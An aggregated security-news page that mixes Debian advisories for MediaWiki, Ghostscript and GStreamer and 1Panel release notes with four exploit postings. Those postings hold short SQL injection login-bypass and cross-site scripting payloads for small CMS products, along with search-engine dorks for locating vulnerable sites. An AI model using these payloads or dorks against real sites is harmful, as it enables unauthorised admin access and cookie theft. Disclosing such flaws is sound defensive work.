Debian Linux Security Advisory 5447-1 - Multiple security issues were discovered in MediaWiki, a website engine for collaborative work, which could result in cross-site scripting, a bypass of vandalism protections or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5447-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 05, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : mediawikiCVE ID         : CVE-2023-29141 CVE-2023-36674 CVE-2023-36675Debian Bug     : 1039075Multiple security issues were discovered in MediaWiki, a website enginefor collaborative work, which could result in cross-site scripting, abypass of vandalism protections or information disclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 1:1.35.11-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 1:1.39.4-1~deb12u1.We recommend that you upgrade your mediawiki packages.For the detailed security status of mediawiki please refer toits security tracker page at:https://security-tracker.debian.org/tracker/mediawikiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSlqxIACgkQEMKTtsN8TjbJRBAAodt+4EzI/HLq3hr2OU6K3WE6W2ThrPSMNev0TLyCTw7GeX4avi3cKjNLwqdPWGE4BjC6YAb5qU6Z9rqL00megvqihL5kaf010++jXk1/9uruENkOSj+KJuWtqLIvX3MYH4EU5gLRD6we8+LzTJQX46UNXtUVSQ7ixZNegzWGbZ8usI046x3YwAHVMTf5tn3M/XBKdhd9UcvffB+qM4Dkyyr1+/tJXyIzxYq8RbHDFW8ggvKZTJ1xSXVY4G0G4k+kQEvWtyUvIzypj5hdAI2zzSUXstFKl64dMwS35hXq8HrORJZwYVTgmLw56D346wYr5SelP++NO5Ap+nGmjc4bn3UxAMnc6EvCKC5L9nO8dYviMMe7EyLqyKhdrPXJXV0c+Yxznn3SRh9iRoVXwkfEmE+JT562qvk3ozu548AH8NzRaCEdv7DzuxhgBSrZMbOozDTmMiEUbe7beKfhSwo8tpRqlVlcA4Pk+v2TnEE6sQN6+gwrLaOyv7N9zwlofFHrjMyR68oFyNg9+cWhuLpca+NUjJE1mzk7V+2ehh1bH83YNAeStYqYqgK1oJcKNS/xVhCOm246TOwCROw5FwO7oZTYy44BUXrMZh+t/Srf2ko7lsYlPLWoz8t0gfZ47YMraeNoiewkq7Ij8RvhL/ZKOlB45MHlWewh0KR97HwItOE=1rTe-----END PGP SIGNATURE-----

Debian Security Advisory 5447-1

1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. The vulnerability has been fixed in v1.3.6.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 功能优化**

*   应用商店列表增加分页显示。 by @zhengkunwang223 in #1447
*   SSH 登录日志列表查询逻辑优化。 by @ssongliu in #1435

**2.2 问题修复**

*   修复了由于 docker 版本低导致应用无法正常操作的问题。 by @zhengkunwang223 in #1446
*   修复了执行备份根目录文件夹计划任务失败的问题。 by @ssongliu in #1444
*   修复了系统数据库文件无法正常读写时系统提示错误的问题。 by @ssongliu in #1438
*   修复了添加镜像仓库和进入容器终端存在命令注入的问题。 by @ssongliu in #1443
*   修复了设置容器镜像加速和私有仓库时由于空行导致 docker 无法正常启用的问题。 by @ssongliu in #1437

CVE-2023-36457: Release v1.3.6 · 1Panel-dev/1Panel

Debian Linux Security Advisory 5446-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5446-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-36664It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle permission validation for pipe devices, whichcould result in the execution of arbitrary commands if malformeddocument files are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 9.53.3~dfsg-7+deb11u5.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u1.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSjKvpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5lBAAivkfCmcEfUUjFaT3xhCMNFX5bCHJalKiZ0YpLfLOq6zhveOUoemlI6ValXRmV3kOz7ZdgghXkQ+TxrdcK0GmKy/Mb5Osi4oWU9KcID8Qa/Gu0aEGuz0YCCikyGcaUMlkaZZRtnse5lPOf27avgBDZEkw5vwSXlCEdgleOY/fpX13sKdOrUB5H4Ma79T5RqcLIxMQn/L2YChfjz+3iuY5rfgY50d00g+1r+xomALzQBqYpMFB2iM52gwoBTOQ9nVr2+fuQdfE71ZVHjqOn+xVhJhhKp7fG/uzPz021L1Jec0xvjxh3WGEPfc8kF6sShnoze06l9LfyyVsH629+G0zxcvaK2chku5iJU1zzUh5NQiCMbo6Tdp1c8OxIuuPwdVIRJbMqCDPvz+UJ/KxbnAhN77f/3eb98wTdPWHdW6t5LPdngDxXimHg6RXi2eANVjFOp6XZZ6iju9TvsxPq/MMiBlbD5KPnUK8n6sl8O1b7lHZgy7KU2qFIqWcs482gsrf9ZIMMR4PgNJjp3YQDXjkME/AgUwWKpEx91MKSyc1ygfZYJr7WRnwg81dgTX7hx/GW9fcwprTcGn2H3FmJsnuIYz9wsgLp5x6/WWB1tF7ZGzhYHNgK0QphejDDGTDUTqRcYsiVTkfutBJw2OzDVoIQyrUn78y9Ux1aueF1NM1fMQ==bsYs-----END PGP SIGNATURE-----

Debian Security Advisory 5446-1

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

AppleZeed CMS 2.0 SQL Injection

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

**Adveris CMS 3.0 Cross Site Scripting**

Posted Jul 4, 2023

Authored by indoushka

Adveris CMS version 3.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f4e69d15add89915deaf239446b331cc9106cc57ee69bf29f992d6be03d4d471

Download | Favorite | View

**Adveris CMS 3.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Adveris CMS v3.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://adveris.fr                                                                                                  |  | # Dork      : "Création site internet : Adveris" inurl:.php?id=                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!>[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,556)
*   Arbitrary (16,119)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,329)
*   DoS (23,289)
*   Encryption (2,363)
*   Exploit (51,413)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,628)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,791)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,067)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,709)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Adveris CMS 3.0 Cross Site Scripting

Debian Linux Security Advisory 5445-1 - Multiple multiple vulnerabilities were discovered in plugins for the GStreamer media framework and its codecs and demuxers, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5445-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 02, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-good1.0CVE ID         : not yet availableMultiple multiple vulnerabilities were discovered in plugins for theGStreamer media framework and its codecs and demuxers, which may resultin denial of service or potentially the execution of arbitrary code if amalformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-2+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-5+deb12u1.We recommend that you upgrade your gst-plugins-good1.0 packages.For the detailed security status of gst-plugins-good1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-good1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmShHBUACgkQEMKTtsN8TjYjWRAAtkNknMdSlppX3c7El527yhBUx1YcczwIqvH1hI7H8hMGaxqIzkkM2K0X1H7dXcqHwo2DSgDjg8BQXZ6tpU7x6Y4jcuJzghqVsHaI6K6Up8zvo0zE3ASYWWDikYbD7EHlSuFRwVoMXNbdp5Pg5pp+m8m0JBYZe2IWrhB/EMh/+WNA4Nbbxq2Zz6HStQKvhqAonSHgBdkPr+Pi05XZ62ynfdtOYe6UGicTu9/uN3jPtximXSrkztU/K2u1eUQjG+2okJr/unypnn8C9KlA4d5iK0Cg4kmBTw5AAVLE/B+WYTRTEh4Aujxq58zkk6QxwyEXK8nlkWppN4qQk50sLa0fsLMDM36LtCAJlNBuerOnYgSUrLu/hKikHUVp4cCBppNFYafg5Z2GQcN4g4M02Imq4JknutfgHjo5I2XL/8tOVxTGQFIXtLlattxyjTucexgOCI1S7KITbUwTAlHGUBJxYZxF6HJJZDEBsMyLoN6bP4QWR1oXwr6mVqrMKJd7w/FWm2h4b1TwDajk5vx1bO/dux7z3fvt6/lbN0gMFWFcV2nuM8ZXSeu8jkNFD+tWt7Npbfa6nbcfOpjxx9LaDxWPBxCcLoQLCGsbk1j7ybcM7Ivdts4QpPKV3pCm5vRhd5BdYQ2trtOsoohA3pvPzmy3T379B0dfpQYsV+/opJ9StRw==3bHm-----END PGP SIGNATURE-----

Debian Security Advisory 5445-1

Debian Linux Security Advisory 5444-1 - Multiple multiple vulnerabilities were discovered in plugins for the GStreamer media framework and its codecs and demuxers, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5444-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 02, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-bad1.0CVE ID         : not yet availableMultiple multiple vulnerabilities were discovered in plugins for theGStreamer media framework and its codecs and demuxers, which may resultin denial of service or potentially the execution of arbitrary code ifa malformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-4+deb12u1.We recommend that you upgrade your gst-plugins-bad1.0 packages.For the detailed security status of gst-plugins-bad1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-bad1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmShHBMACgkQEMKTtsN8TjZhzA//Vucdiu2M/ZA/CUM+5ZQvB9HotGO+WYpirqGMUbqjzWhiKJ9WYv/aLUQRo1ZAFptb6cpgnITkcvKQMtcy/GbTPegTLJC1VpgFOD80vtyKlilBaHep+v8YIkgT3E1xlbRTkr7t5ZADbAD5JsiJHpi9Qb79CoIa+iK3PzCqoSIGBHtpCUIFLOUeloaXLbzdyDh84UBqaZLFlVC6VonifkiVU6zIGwgL20yein2UAo/YIH3tB25TP9hjD/LA1ZG/b7qUKVLS7QW4I/0rTBhZDIB/a9dFuaxImpAXjYWAs+L5tC1jmgFFxZWsYISfGz6GPkdKGZdKUr3tyricVTKBquQfe3S8vtY/yxBKEZ2mEDnWBHbah3/4aov8+31MIpurh58m9TRkXuLp9f84851YW4AQd/IWoTrO3nxlmpIsY+ePRBQvqZhGrJU3/ERvrxmX7h/76sXHVA9+urzxc6+FbBWP8Qkk7hXaFr591Sriq3SfGXO1xECdBwWbVRxi/qOKpKRq0dDB4I3OPV0uXbBfjYIZG/n1C9LeIvO+t76vGL9EXYBVMbCqYgtfKwEHcmjHWYuF73TGvppXUkOFRj/5VsGVw2Gdka8lKRHLzIT1Qpr19CdyCIEX+bn1RHJCTgMEvJ0+6MjNSnkEYEZ6JOepcMf6tUTPscS25VNweEfv6/dVbBY==yu1K-----END PGP SIGNATURE-----

Debian Security Advisory 5444-1

Debian Linux Security Advisory 5443-1 - Multiple multiple vulnerabilities were discovered in plugins for the GStreamer media framework and its codecs and demuxers, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5443-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 02, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-base1.0CVE ID         : not yet availableMultiple multiple vulnerabilities were discovered in plugins for theGStreamer media framework and its codecs and demuxers, which may resultin denial of service or potentially the execution of arbitrary code if amalformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-3+deb12u1.We recommend that you upgrade your gst-plugins-base1.0 packages.For the detailed security status of gst-plugins-base1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-base1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmShHA4ACgkQEMKTtsN8Tja5bxAAgjo7MGD633UzSM+ipFEV87dcZqOTFRWECfR8QSZIm0Z4o6a3gK/ikwnnbUvf5b9Mvkbj7fyosaCKZa4HLbxxG9WQrnj42GBfabNouerIO+8/VylHA3pkyI+ABCXyYAlN81amT0/7w8pORz/1cP1X/x+mYtPsq+8yQBTISozs3gmJo+jCuYsfddJteITv/YvcVrunaO5XJNcXUbTaMqjvIfQkeeT/0OR1F08eCbnb8SROQ4bLySXo1hC8SmeYuI7jDcFatws6XWVjjsCG92KnX+2bMRnNP7ROR823RldgIJdoPw4R/0psenrqUzzhIKM5YwqcIkpwSVAUaQJ5238fabmk9lSygfRwqDffxcZhHTEfnGEz0RAI1QbX5bLsHd2k9zZtfRUqlPOtYRznLakIEcmEq9WlUIPON6cL58wy0g3waXMue8fbtVwsqG815WTNcnntTxj1F08Z8GuQTAkpyzaJ80nskIfbfL1Ei5C3jFGKBnqRwLuCQ8yN0m3raWHXAtj1pt/Zow3KM/DGHyb0BC8n1iznGoRyrMLpWbYP64b7Q8ONeDkKjEwv5mdpOfQGEiLCUyr3Zp7UO0GBwbwhQQoTzEWtRYwe59eIgxdIUQIff8Uh3spqcfRXPxNCDGZ8JD+mjKlOQtJlNokgqDk8lWBrv9H5Yqwc3YPtgo3xeZA==zR0U-----END PGP SIGNATURE-----

Debian Security Advisory 5443-1

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Strawberry 1.1.9 Cross Site Scripting

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

    ====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Tag

#debian